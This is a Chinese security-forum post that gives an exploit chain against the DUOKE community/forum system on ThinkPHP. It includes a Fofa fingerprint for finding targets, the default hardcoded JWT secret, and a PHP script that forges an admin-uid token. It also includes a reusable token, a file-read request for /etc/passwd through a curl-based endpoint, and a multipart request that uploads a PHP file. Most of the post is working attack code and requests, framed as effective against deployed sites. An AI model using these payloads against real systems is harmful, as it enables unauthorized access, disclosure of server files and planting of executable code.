多客圈子论坛社区系统前台文件读取+文件上传漏洞-网络安全论坛-网络安全-阻击者联盟

多客圈子论坛社区系统前台文件读取+文件上传漏洞

勾八徽章-人气大使-阻击者联盟等级-LV2-阻击者联盟昨天发布
10
0x00 前言

DUOKE多客圈子论坛社区系统,含完整的后台PHP系统。功能:小程序授权登陆,H5和APP,手机号登陆,发帖,建圈子、发活动。圈主可置顶推荐帖子,关注、粉丝、点赞等。可作为圈子贴吧、小红书等自媒体。

Fofa指纹:

"/static/index/js/jweixin-1.2.0.js"

d2b5ca33bd20250726072608

d2b5ca33bd20250726072615

框架:ThinkPHP 6.0.12 Debug:True
0x01 前台JWT伪造漏洞

jwt 位于 /config/jwt.php 中,一般人都不会去改他

return [
    'key' => '966285d811d508e0383235c457d79391',
    'expire'  => 7
];

然后直接写php,伪造一下jwt ,代码如下

d2b5ca33bd20250726072656

<?php
    function base64url_encode($data)
    {
        return rtrim(strtr(base64_encode($data), '+/', '-_'), '='); 
    }
 $payload=['uid' => '1'];
 $key='966285d811d508e0383235c457d79391';
 $header = array('typ' => 'JWT', 'alg' => 'HS256');
 $segments = [];
 $segments[] = base64url_encode(json_encode($header));
 $segments[] = base64url_encode(json_encode($payload));
 $signing_input = implode('.', $segments);
 $signature = hash_hmac('sha256',$signing_input, $key, true);
 $segments[] = base64url_encode($signature);
 $jwt = implode('.', $segments);
echo $jwt;

要是懒得构造,可以直接访问 /api/login 直接输出uid为1的token的,这代码写的也是抽象

d2b5ca33bd20250726072737

有了jwt token,就可以使用api控制器下的那些东西,文件读取啊 上传之类的都可以打

0x02 前台任意文件读取漏洞

之前旧的那个文件读取洞修了,但是其实在 /app/api/controller/User.php 控制器中同样有一个curl_exec 可以读取,只是需要token 而上面的洞正好可以直接构造一个(其实都不用构造,一般固定的,没人改).

public function httpGet($url) {
  $curl = curl_init();
  curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
  curl_setopt($curl, CURLOPT_TIMEOUT, 500);
  curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
  curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
  curl_setopt($curl, CURLOPT_URL, $url);
  $res = curl_exec($curl);
  curl_close($curl);
  return $res;
}

Payload (token不用改他,通杀的):

GET /api/user/httpGet?url=file:///etc/passwd HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Host: 127.0.0.1
Proxy-Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1aWQiOjF9.VQtQaEk7rvMOGHV5dBlNjWpWtBL-gFNpKBMNXTX3_ns

d2b5ca33bd20250726072901

0x03 前台任意文件上传漏洞

可能有部分站点修复了该洞,直接访问请求,上传任意文件,记得带token 

POST /index.php/api/User/up_img HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Cache-Control: max-age=0
Connection: keep-alive
Content-Length: 197
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrkWB0L5fVE0zhYng
Host: 127.0.0.1
Origin: http://127.0.0.1
Referer: http://127.0.0.1/index.php/api/User/up_img
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1aWQiOjF9.VQtQaEk7rvMOGHV5dBlNjWpWtBL-gFNpKBMNXTX3_ns

------WebKitFormBoundary03rNBzFMIytvpWhy
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/jpeg

<?php phpinfo();?>
------WebKitFormBoundary03rNBzFMIytvpWhy--

d2b5ca33bd20250726072931

d2b5ca33bd20250726072939

 

评分
欢迎为Ta评分
分享
请登录后发表评论

    没有回复内容

zibll子比主题
本站同款主题模板
zibll子比主题是一款漂亮优雅的网站主题模板,功能强大,配置简单。
查看详情
发布帖子
在手机上浏览此页面